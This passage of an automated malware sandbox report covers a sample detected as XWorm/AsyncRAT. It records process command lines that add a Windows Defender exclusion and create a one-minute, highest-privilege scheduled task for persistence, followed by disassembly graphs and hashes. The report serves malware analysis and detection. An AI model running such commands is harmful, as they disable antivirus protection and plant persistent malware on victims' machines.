                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'sv_chost.exe'
                                                              Imagebase:0x7ff788560000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:20
                                                              Start time:15:55:58
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:22
                                                              Start time:15:56:25
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\schtasks.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe"
                                                              Imagebase:0x7ff76f990000
                                                              File size:235'008 bytes
                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:23
                                                              Start time:15:56:25
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:24
                                                              Start time:15:56:27
                                                              Start date:24/08/2024
                                                              Path:C:\Users\user\AppData\Roaming\sv_chost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Users\user\AppData\Roaming\sv_chost.exe
                                                              Imagebase:0xb00000
                                                              File size:84'480 bytes
                                                              MD5 hash:8AC3D32DDD136180B75C36A39398F39F
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\sv_chost.exe, Author: Joe Security
                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\sv_chost.exe, Author: ditekSHen
                                                              Antivirus matches:
                                                              • Detection: 100%, Avira
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 76%, ReversingLabs
                                                              Has exited:true

                                                              General

                                                              Target ID:25
                                                              Start time:15:56:37
                                                              Start date:24/08/2024
                                                              Path:C:\Users\user\AppData\Roaming\sv_chost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\AppData\Roaming\sv_chost.exe"
                                                              Imagebase:0x2c0000
                                                              File size:84'480 bytes
                                                              MD5 hash:8AC3D32DDD136180B75C36A39398F39F
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:26
                                                              Start time:15:56:45
                                                              Start date:24/08/2024
                                                              Path:C:\Users\user\AppData\Roaming\sv_chost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\AppData\Roaming\sv_chost.exe"
                                                              Imagebase:0x6a0000
                                                              File size:84'480 bytes
                                                              MD5 hash:8AC3D32DDD136180B75C36A39398F39F
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:6.9%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:2
                                                                Total number of Limit Nodes:0
                                                                execution_graph 27788 1175598 27789 11755a5 VirtualAlloc 27788->27789

                                                                Executed Functions

                                                                Function 02E747A0 Relevance: 6.7, Strings: 5, Instructions: 440COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 2e747a0-2e747d6 124 2e747d8 call 2e740f0 0->124 125 2e747d8 call 2e747a0 0->125 1 2e747de-2e747e4 2 2e747e6-2e747ea 1->2 3 2e74834-2e74838 1->3 4 2e747ec-2e747f1 2->4 5 2e747f9-2e74800 2->5 6 2e7484f-2e74863 3->6 7 2e7483a-2e74849 3->7 4->5 9 2e748d6-2e74913 5->9 10 2e74806-2e7480d 5->10 8 2e7486b-2e74872 6->8 11 2e74875-2e7487f 7->11 12 2e7484b-2e7484d 7->12 22 2e74915-2e7491b 9->22 23 2e7491e-2e7493e 9->23 10->3 15 2e7480f-2e74813 10->15 13 2e74881-2e74887 11->13 14 2e74889-2e7488d 11->14 12->8 17 2e74895-2e748cf 13->17 14->17 18 2e7488f 14->18 19 2e74815-2e7481a 15->19 20 2e74822-2e74829 15->20 17->9 18->17 19->20 20->9 21 2e7482f-2e74832 20->21 21->8 22->23 28 2e74945-2e7494c 23->28 29 2e74940 23->29 32 2e7494e-2e74959 28->32 31 2e74cd4-2e74cdd 29->31 33 2e74ce5-2e74cf2 32->33 34 2e7495f-2e74972 32->34 39 2e74974-2e74982 34->39 40 2e74988-2e749a3 34->40 39->40 43 2e74c5c-2e74c63 39->43 44 2e749c7-2e749ca 40->44 45 2e749a5-2e749ab 40->45 43->31 48 2e74c65-2e74c67 43->48 49 2e74b24-2e74b2a 44->49 50 2e749d0-2e749d3 44->50 46 2e749b4-2e749b7 45->46 47 2e749ad 45->47 52 2e749ea-2e749f0 46->52 53 2e749b9-2e749bc 46->53 47->46 47->49 51 2e74c16-2e74c19 47->51 47->52 54 2e74c76-2e74c7c 48->54 55 2e74c69-2e74c6e 48->55 49->51 56 2e74b30-2e74b35 49->56 50->49 57 2e749d9-2e749df 50->57 58 2e74ce0 51->58 59 2e74c1f-2e74c25 51->59 60 2e749f6-2e749f8 52->60 61 2e749f2-2e749f4 52->61 62 2e74a56-2e74a5c 53->62 63 2e749c2 53->63 54->33 64 2e74c7e-2e74c83 54->64 55->54 56->51 57->49 65 2e749e5 57->65 58->33 67 2e74c27-2e74c2f 59->67 68 2e74c4a-2e74c4e 59->68 69 2e74a02-2e74a0b 60->69 61->69 62->51 66 2e74a62-2e74a68 62->66 63->51 70 2e74c85-2e74c8a 64->70 71 2e74cc8-2e74ccb 64->71 65->51 72 2e74a6e-2e74a70 66->72 73 2e74a6a-2e74a6c 66->73 67->33 74 2e74c35-2e74c44 67->74 68->43 77 2e74c50-2e74c56 68->77 75 2e74a1e-2e74a46 69->75 76 2e74a0d-2e74a18 69->76 70->58 79 2e74c8c 70->79 71->58 78 2e74ccd-2e74cd2 71->78 81 2e74a7a-2e74a91 72->81 73->81 74->40 74->68 99 2e74a4c-2e74a51 75->99 100 2e74b3a-2e74b70 75->100 76->51 76->75 77->32 77->43 78->31 78->48 80 2e74c93-2e74c98 79->80 82 2e74cba-2e74cbc 80->82 83 2e74c9a-2e74c9c 80->83 92 2e74a93-2e74aac 81->92 93 2e74abc-2e74ae3 81->93 82->58 90 2e74cbe-2e74cc1 82->90 87 2e74c9e-2e74ca3 83->87 88 2e74cab-2e74cb1 83->88 87->88 88->33 91 2e74cb3-2e74cb8 88->91 90->71 91->82 95 2e74c8e-2e74c91 91->95 92->100 105 2e74ab2-2e74ab7 92->105 93->58 104 2e74ae9-2e74aec 93->104 95->58 95->80 99->100 106 2e74b72-2e74b76 100->106 107 2e74b7d-2e74b85 100->107 104->58 108 2e74af2-2e74b1b 104->108 105->100 109 2e74b95-2e74b99 106->109 110 2e74b78-2e74b7b 106->110 107->58 111 2e74b8b-2e74b90 107->111 108->100 123 2e74b1d-2e74b22 108->123 112 2e74b9b-2e74ba1 109->112 113 2e74bb8-2e74bbc 109->113 110->107 110->109 111->51 112->113 115 2e74ba3-2e74bab 112->115 116 2e74bc6-2e74be2 113->116 117 2e74bbe-2e74bc4 113->117 115->58 118 2e74bb1-2e74bb6 115->118 120 2e74beb-2e74bef 116->120 117->116 117->120 118->51 120->51 121 2e74bf1-2e74c0d 120->121 121->51 123->100 124->1 125->1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                                • API String ID: 0-2525668591
                                                                • Opcode ID: 75e15723d66893caddab3b8e94c64067e0a099765903dd0b5fe1200803ad5de2
                                                                • Instruction ID: 811209f8e861318d175e2b9a98fd4f8e9a15d85bf8ff703dfba155b850790f41
                                                                • Opcode Fuzzy Hash: 75e15723d66893caddab3b8e94c64067e0a099765903dd0b5fe1200803ad5de2
                                                                • Instruction Fuzzy Hash: 12024D75A40119DFDB14CFA9D984AAEBBF2FF88308F15D169E415AB2A1D730EC41CB60
                                                                Function 02E740F0 Relevance: 3.1, Strings: 2, Instructions: 567COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (o^q$Hbq
                                                                • API String ID: 0-662517225
                                                                • Opcode ID: 9fff27da940dc3bb7300e3cdff1391bfa03d59904dedddf9aa25bd1b1212991a
                                                                • Instruction ID: d237bd09f02dcb2bf7ba13f1c3e02143eec3cdff7b02a0fb913f50ccba65fd57
                                                                • Opcode Fuzzy Hash: 9fff27da940dc3bb7300e3cdff1391bfa03d59904dedddf9aa25bd1b1212991a
                                                                • Instruction Fuzzy Hash: 73228C71A402199FDB14DF69D854BAEBBF6BF88304F248569E509EB391DB30DC42CB90
                                                                Function 02E71160 Relevance: 2.8, Strings: 2, Instructions: 260COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 779 2e71160-2e7116d 780 2e71176-2e71186 779->780 781 2e7116f-2e71171 779->781 783 2e7118d-2e7119d 780->783 784 2e71188 780->784 782 2e71415-2e7141c 781->782 786 2e711a3-2e711b1 783->786 787 2e713fc-2e7140a 783->787 784->782 790 2e711b7 786->790 791 2e7141d-2e71496 786->791 787->791 792 2e7140c-2e71410 call 2e701e8 787->792 790->791 794 2e712e7-2e7130f 790->794 795 2e71222-2e71243 790->795 796 2e71381-2e713ad 790->796 797 2e713af-2e713ca call 2e701d8 790->797 798 2e7126e-2e7128f 790->798 799 2e713cc-2e713ee 790->799 800 2e71248-2e71269 790->800 801 2e71356-2e7137c 790->801 802 2e711d5-2e711f6 790->802 803 2e71294-2e712b5 790->803 804 2e71314-2e71351 790->804 805 2e713f0-2e713fa 790->805 806 2e711be-2e711d0 790->806 807 2e711fb-2e7121d 790->807 808 2e712ba-2e712e2 790->808 792->782 794->782 795->782 796->782 797->782 798->782 799->782 800->782 801->782 802->782 803->782 804->782 805->782 806->782 807->782 808->782
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Xbq$$^q
                                                                • API String ID: 0-1593437937
                                                                • Opcode ID: 56e55044b7a00611cf3bec605ff39e7b13dbc605de10f1f4e2317c9172d4c27a
                                                                • Instruction ID: 1bd54033b247bff1013c9386dee7beccdd178cbb25c0be8b49c80967314e7d5c
                                                                • Opcode Fuzzy Hash: 56e55044b7a00611cf3bec605ff39e7b13dbc605de10f1f4e2317c9172d4c27a
                                                                • Instruction Fuzzy Hash: 14818F74F402189BDB58EF7898546BE7BB7BBC8711B14C939D40AEB388DE348C029795
                                                                Function 02E72BC8 Relevance: 6.5, Strings: 5, Instructions: 226COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 126 2e72bc8-2e72c93 call 2e723fc 138 2e72ecd-2e72ed6 126->138 139 2e72c99-2e72ca0 126->139 143 2e72eed 138->143 144 2e72ed8-2e72ee5 138->144 139->138 140 2e72ca6-2e72cad 139->140 140->138 142 2e72cb3-2e72cc7 140->142 195 2e72cc9 call 2e72f03 142->195 196 2e72cc9 call 2e72f18 142->196 149 2e72eee 143->149 144->143 145 2e72ccf-2e72cd3 146 2e72cd5-2e72cd9 145->146 147 2e72d0e-2e72d3c 145->147 146->138 150 2e72cdf-2e72d0b 146->150 156 2e72d40-2e72d4c 147->156 157 2e72d3e 147->157 149->149 150->147 159 2e72d4e-2e72d7a call 2e727d0 156->159 157->159 166 2e72d82-2e72d85 159->166 167 2e72d8b-2e72e05 166->167 168 2e72e89 166->168 170 2e72e8e 167->170 183 2e72e0b-2e72e12 167->183 168->170 172 2e72e93-2e72e97 170->172 173 2e72eae 172->173 174 2e72e99-2e72ea6 172->174 173->138 174->173 183->170 184 2e72e14-2e72e1b 183->184 184->170 185 2e72e1d-2e72e3d 184->185 187 2e72e50-2e72e54 185->187 188 2e72e3f-2e72e43 185->188 190 2e72e56-2e72e5a 187->190 191 2e72e64-2e72e87 187->191 188->170 189 2e72e45-2e72e4d 188->189 189->187 190->170 192 2e72e5c 190->192 191->172 192->191 195->145 196->145
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q$PH^q$Te^q$XX^q$XX^q
                                                                • API String ID: 0-427891639
                                                                • Opcode ID: e9ae62f8fc8de98cdf6e87afa11bb80ac67b7517706e34339be232fba85005b2
                                                                • Instruction ID: 5081a9680a5108f9313d92a413dbc463388ce1665c4e976537585ba7a2618e57
                                                                • Opcode Fuzzy Hash: e9ae62f8fc8de98cdf6e87afa11bb80ac67b7517706e34339be232fba85005b2
                                                                • Instruction Fuzzy Hash: 6481E130F402449FD728AB79D89876EBAE3BBC4304F24C86DD5569B398CB359C85CB91
                                                                Function 02E75FA0 Relevance: 3.3, Strings: 2, Instructions: 784COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 197 2e75fa0-2e7648e 272 2e76494-2e764a4 197->272 273 2e769e0-2e76a15 197->273 272->273 274 2e764aa-2e764ba 272->274 278 2e76a17-2e76a1c 273->278 279 2e76a21-2e76a3f 273->279 274->273 275 2e764c0-2e764d0 274->275 275->273 277 2e764d6-2e764e6 275->277 277->273 280 2e764ec-2e764fc 277->280 281 2e76b06-2e76b0b 278->281 290 2e76ab6-2e76ac2 279->290 291 2e76a41-2e76a4b 279->291 280->273 283 2e76502-2e76512 280->283 283->273 284 2e76518-2e76528 283->284 284->273 286 2e7652e-2e7653e 284->286 286->273 287 2e76544-2e76554 286->287 287->273 289 2e7655a-2e7656a 287->289 289->273 292 2e76570-2e769df 289->292 297 2e76ac4-2e76ad0 290->297 298 2e76ad9-2e76ae5 290->298 291->290 296 2e76a4d-2e76a59 291->296 307 2e76a7e-2e76a81 296->307 308 2e76a5b-2e76a66 296->308 297->298 304 2e76ad2-2e76ad7 297->304 305 2e76ae7-2e76af3 298->305 306 2e76afc-2e76afe 298->306 304->281 305->306 317 2e76af5-2e76afa 305->317 306->281 309 2e76a83-2e76a8f 307->309 310 2e76a98-2e76aa4 307->310 308->307 319 2e76a68-2e76a72 308->319 309->310 321 2e76a91-2e76a96 309->321 313 2e76aa6-2e76aad 310->313 314 2e76b0c-2e76b5b call 2e76ccf 310->314 313->314 318 2e76aaf-2e76ab4 313->318 327 2e76b61-2e76b68 314->327 317->281 318->281 319->307 325 2e76a74-2e76a79 319->325 321->281 325->281 329 2e76b7b-2e76b86 327->329 330 2e76b6a-2e76b75 327->330 335 2e76c57-2e76c86 329->335 336 2e76b8c-2e76bfb 329->336 330->329 334 2e76bfe-2e76c50 330->334 334->335
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q
                                                                • API String ID: 0-355816377
                                                                • Opcode ID: bbc0ae04281a26346967f378526dfe96eab8fa6c8211157c685bedc62f71f11c
                                                                • Instruction ID: 3d0500ea46961365de2ec401e15f92f6bd2d5914e00fa363c5f9e942bd25f59d
                                                                • Opcode Fuzzy Hash: bbc0ae04281a26346967f378526dfe96eab8fa6c8211157c685bedc62f71f11c
                                                                • Instruction Fuzzy Hash: 1F624174A40258CFDB14DBA4C860B9EBB77EF88300F2081A9D50A6B3A5DF359D85DF51
                                                                Function 02E737F8 Relevance: 2.8, Strings: 2, Instructions: 327COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 671 2e737f8-2e7381a 672 2e73830-2e7383b 671->672 673 2e7381c-2e73820 671->673 676 2e738e3-2e7390f 672->676 677 2e73841-2e73843 672->677 674 2e73822-2e7382e 673->674 675 2e73848-2e7384f 673->675 674->672 674->675 679 2e73851-2e73858 675->679 680 2e7386f-2e73878 675->680 684 2e73916-2e7396e 676->684 678 2e738db-2e738e0 677->678 679->680 682 2e7385a-2e73865 679->682 776 2e7387a call 2e737e9 680->776 777 2e7387a call 2e737f8 680->777 682->684 685 2e7386b-2e7386d 682->685 683 2e73880-2e73882 686 2e73884-2e73888 683->686 687 2e7388a-2e73892 683->687 703 2e73970-2e73976 684->703 704 2e7397d-2e7398f 684->704 685->678 686->687 689 2e738a5-2e738c4 call 2e740f0 686->689 690 2e73894-2e73899 687->690 691 2e738a1-2e738a3 687->691 697 2e738c6-2e738cf 689->697 698 2e738d9 689->698 690->691 691->678 774 2e738d1 call 2e75fa0 697->774 775 2e738d1 call 2e75f90 697->775 698->678 700 2e738d7 700->678 703->704 706 2e73995-2e73999 704->706 707 2e73a23-2e73a27 call 2e73baf 704->707 708 2e7399b-2e739a7 706->708 709 2e739a9-2e739b6 706->709 710 2e73a2d-2e73a33 707->710 715 2e739b8-2e739c2 708->715 709->715 711 2e73a35-2e73a3b 710->711 712 2e73a3f-2e73a46 710->712 716 2e73aa1-2e73ae3 711->716 717 2e73a3d 711->717 720 2e739c4-2e739d3 715->720 721 2e739ef-2e739f3 715->721 740 2e73aec-2e73b00 716->740 717->712 732 2e739d5-2e739dc 720->732 733 2e739e3-2e739ed 720->733 722 2e739f5-2e739fb 721->722 723 2e739ff-2e73a03 721->723 726 2e739fd 722->726 727 2e73a49-2e73a9a 722->727 723->712 728 2e73a05-2e73a09 723->728 726->712 727->716 729 2e73b07-2e73b1d 728->729 730 2e73a0f-2e73a21 728->730 739 2e73b1f-2e73b2b 729->739 729->740 730->712 732->733 733->721 742 2e73b31-2e73b33 739->742 743 2e73b2d-2e73b2f 739->743 740->729 748 2e73b35-2e73b39 742->748 749 2e73b44-2e73b46 742->749 747 2e73ba9-2e73bac 743->747 751 2e73b3f-2e73b42 748->751 752 2e73b3b-2e73b3d 748->752 753 2e73b59-2e73b5f 749->753 754 2e73b48-2e73b4c 749->754 751->747 752->747 758 2e73b61-2e73b88 753->758 759 2e73b8a-2e73b8c 753->759 756 2e73b52-2e73b57 754->756 757 2e73b4e-2e73b50 754->757 756->747 757->747 762 2e73b93-2e73b95 758->762 759->762 764 2e73b97-2e73b99 762->764 765 2e73b9b-2e73b9d 762->765 764->747 767 2e73ba6 765->767 768 2e73b9f-2e73ba4 765->768 767->747 768->747 774->700 775->700 776->683 777->683
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Hbq$Hbq
                                                                • API String ID: 0-4258043069
                                                                • Opcode ID: 0635664e999adde8c243eb11ddc973abba425ecc6f15500290a05538f1ed8168
                                                                • Instruction ID: 884cb5fe63d8e4213bb12b784ba3a5b04e7391392416220ae552942e122dc490
                                                                • Opcode Fuzzy Hash: 0635664e999adde8c243eb11ddc973abba425ecc6f15500290a05538f1ed8168
                                                                • Instruction Fuzzy Hash: B6B1DC307802559FDB55AF38D854B6A7BE6ABC8314F1489A9E806CB390DF35CC02EB91
                                                                Function 02E73D58 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 860 2e73d58-2e73d65 861 2e73d67-2e73d6b 860->861 862 2e73d6d-2e73d6f 860->862 861->862 863 2e73d74-2e73d7f 861->863 864 2e73f80-2e73f87 862->864 865 2e73d85-2e73d8c 863->865 866 2e73f88 863->866 867 2e73d92-2e73da1 865->867 868 2e73f21-2e73f27 865->868 870 2e73f8d-2e73fc5 866->870 869 2e73da7-2e73db6 867->869 867->870 871 2e73f2d-2e73f31 868->871 872 2e73f29-2e73f2b 868->872 878 2e73dcb-2e73dce 869->878 879 2e73db8-2e73dbb 869->879 890 2e73fc7-2e73fcc 870->890 891 2e73fce-2e73fd2 870->891 873 2e73f33-2e73f39 871->873 874 2e73f7e 871->874 872->864 873->866 876 2e73f3b-2e73f3e 873->876 874->864 876->866 880 2e73f40-2e73f55 876->880 882 2e73dda-2e73de0 878->882 883 2e73dd0-2e73dd3 878->883 881 2e73dbd-2e73dc0 879->881 879->882 899 2e73f57-2e73f5d 880->899 900 2e73f79-2e73f7c 880->900 885 2e73dc6 881->885 886 2e73ec1-2e73ec7 881->886 892 2e73de2-2e73de8 882->892 893 2e73df8-2e73e15 882->893 887 2e73e26-2e73e2c 883->887 888 2e73dd5 883->888 896 2e73eec-2e73ef9 885->896 894 2e73edf-2e73ee9 886->894 895 2e73ec9-2e73ecf 886->895 897 2e73e44-2e73e56 887->897 898 2e73e2e-2e73e34 887->898 888->896 901 2e73fd8-2e73fda 890->901 891->901 902 2e73dec-2e73df6 892->902 903 2e73dea 892->903 933 2e73e1e-2e73e21 893->933 894->896 906 2e73ed3-2e73edd 895->906 907 2e73ed1 895->907 925 2e73f0d-2e73f0f 896->925 926 2e73efb-2e73eff 896->926 919 2e73e66-2e73e89 897->919 920 2e73e58-2e73e64 897->920 909 2e73e36 898->909 910 2e73e38-2e73e42 898->910 911 2e73f6f-2e73f72 899->911 912 2e73f5f-2e73f6d 899->912 900->864 904 2e73fef-2e73ff6 901->904 905 2e73fdc-2e73fee 901->905 902->893 903->893 906->894 907->894 909->897 910->897 911->866 915 2e73f74-2e73f77 911->915 912->866 912->911 915->899 915->900 919->866 936 2e73e8f-2e73e92 919->936 934 2e73eb1-2e73ebf 920->934 928 2e73f13-2e73f16 925->928 926->925 927 2e73f01-2e73f05 926->927 927->866 929 2e73f0b 927->929 928->866 930 2e73f18-2e73f1b 928->930 929->928 930->867 930->868 933->896 934->896 936->866 938 2e73e98-2e73eaa 936->938 938->934
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,bq$,bq
                                                                • API String ID: 0-2699258169
                                                                • Opcode ID: 408a1167165a9bcca6eb8fcc0e70dd91ff19b688f97f6038c17af9fae50ada05
                                                                • Instruction ID: 2987d1a550b23ff765ebb5ec85600ec3e55aa06e70350ede6299f2fceb520c55
                                                                • Opcode Fuzzy Hash: 408a1167165a9bcca6eb8fcc0e70dd91ff19b688f97f6038c17af9fae50ada05
                                                                • Instruction Fuzzy Hash: 0B81BF30B802059FCB58CF69C884AEAB7B2FF89258B14E1AAE405DB3A4D731DC41DB51
                                                                Function 02E72170 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 999 2e72170-2e72189 1001 2e7218b-2e7218d 999->1001 1002 2e7219a 999->1002 1003 2e72193-2e72198 1001->1003 1004 2e7218f-2e72191 1001->1004 1006 2e721a2 1002->1006 1005 2e721a4-2e721b2 1003->1005 1004->1005 1008 2e721b4-2e721b6 1005->1008 1009 2e721c8-2e721d0 1005->1009 1006->1005 1010 2e721bf-2e721c6 1008->1010 1011 2e721b8-2e721bd 1008->1011 1012 2e721d3-2e721d6 1009->1012 1010->1012 1011->1012 1014 2e721ed-2e721f1 1012->1014 1015 2e721d8-2e721e6 1012->1015 1016 2e721f3-2e72201 1014->1016 1017 2e7220a-2e7220d 1014->1017 1015->1014 1023 2e721e8 1015->1023 1016->1017 1024 2e72203 1016->1024 1018 2e72215-2e7224a 1017->1018 1019 2e7220f-2e72213 1017->1019 1028 2e722aa-2e722af 1018->1028 1019->1018 1022 2e7224c-2e72263 1019->1022 1025 2e72265-2e72267 1022->1025 1026 2e72269-2e72275 1022->1026 1023->1014 1024->1017 1025->1028 1029 2e72277-2e7227d 1026->1029 1030 2e7227f-2e72289 1026->1030 1031 2e72291-2e722a3 call 2e71160 * 2 1029->1031 1030->1031 1032 2e7228b 1030->1032 1031->1028 1032->1031
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Xbq$Xbq
                                                                • API String ID: 0-1243427068
                                                                • Opcode ID: 3c01caab4fc3fbfdd28ca46b44a37d9eeb5df5623c0bc2e9f2643dca713cc8f1
                                                                • Instruction ID: 6ee5f24e1d00395f742e9e7f10ccd076716c1bd6ff785ccd1ff163772417e620
                                                                • Opcode Fuzzy Hash: 3c01caab4fc3fbfdd28ca46b44a37d9eeb5df5623c0bc2e9f2643dca713cc8f1
                                                                • Instruction Fuzzy Hash: DC31F331B842298BDF1C46AA8D9037F66AABBC4348F149439DF0AD7394DF75CC4586A1
                                                                Function 02E75460 Relevance: 1.7, Strings: 1, Instructions: 458COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1040 2e75460-2e75490 1042 2e75496-2e754b3 1040->1042 1043 2e7553b-2e7554f 1040->1043 1067 2e754b5-2e754c0 1042->1067 1068 2e754c2 1042->1068 1044 2e75551-2e75557 1043->1044 1045 2e755be-2e755c2 1043->1045 1044->1045 1049 2e75559-2e7555c 1044->1049 1046 2e75731-2e7573d 1045->1046 1047 2e755c8-2e755cc 1045->1047 1054 2e7573f-2e75748 1046->1054 1055 2e7574a-2e75750 1046->1055 1050 2e75654-2e75659 1047->1050 1051 2e755d2-2e755d8 1047->1051 1052 2e75562-2e7556f 1049->1052 1053 2e759ff-2e75a2c 1049->1053 1056 2e7565f-2e75662 1050->1056 1057 2e759fa 1050->1057 1051->1057 1058 2e755de-2e755e0 1051->1058 1052->1053 1060 2e75575-2e7558f call 2e75a50 1052->1060 1097 2e75a45-2e75a4c 1053->1097 1098 2e75a2e-2e75a44 1053->1098 1054->1055 1061 2e75765-2e7576c 1054->1061 1055->1057 1062 2e75756-2e75762 1055->1062 1063 2e75664-2e75666 1056->1063 1064 2e7566b-2e7566e 1056->1064 1057->1053 1065 2e755e2-2e755e5 1058->1065 1066 2e7564a-2e7564d 1058->1066 1077 2e75595-2e75598 1060->1077 1070 2e75772-2e7577b 1061->1070 1071 2e75919-2e7591d 1061->1071 1062->1061 1074 2e759f0-2e759f7 1063->1074 1064->1053 1075 2e75674-2e75681 1064->1075 1065->1053 1076 2e755eb-2e755f0 1065->1076 1079 2e7564f 1066->1079 1080 2e755f9-2e755fc 1066->1080 1072 2e754c4-2e754c6 1067->1072 1068->1072 1070->1057 1073 2e75781-2e75784 1070->1073 1081 2e75923-2e7592c 1071->1081 1082 2e759d8-2e759dc 1071->1082 1072->1043 1092 2e754c8-2e754cc 1072->1092 1073->1057 1087 2e7578a-2e757a0 1073->1087 1075->1053 1088 2e75687-2e75697 1075->1088 1076->1066 1084 2e755f2-2e755f4 1076->1084 1093 2e755a1-2e755a4 1077->1093 1094 2e7559a-2e7559c 1077->1094 1086 